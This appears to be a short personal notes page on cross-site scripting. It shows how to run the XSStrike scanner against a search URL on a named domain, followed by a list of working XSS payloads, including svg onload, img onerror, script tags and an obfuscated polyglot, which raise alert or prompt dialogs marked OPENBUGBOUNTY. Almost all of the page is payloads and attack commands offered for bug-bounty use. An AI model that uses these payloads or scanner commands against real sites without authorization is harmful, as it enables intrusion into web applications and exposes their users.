Security

XSS

Use

python xsstrike.py -u "https://domain.de/search.php?query=blades&productsPerPage=15&followSearch=9890&verbose=true" -f default

-f default Brut-force payloads from a file

Option: -f or --file

You can load payloads from a file and check if they work. XSStrike will not perform any analysis in this mode.

python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt

Using default as file path with load XSStrike's default payloads.

https://github.com/s0md3v/XSStrike/wiki/Usage

XSS.txt

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

https://www.openbugbounty.org/blog/miguelsantareno/list-off-basic-cross-site-script-playloads

Tools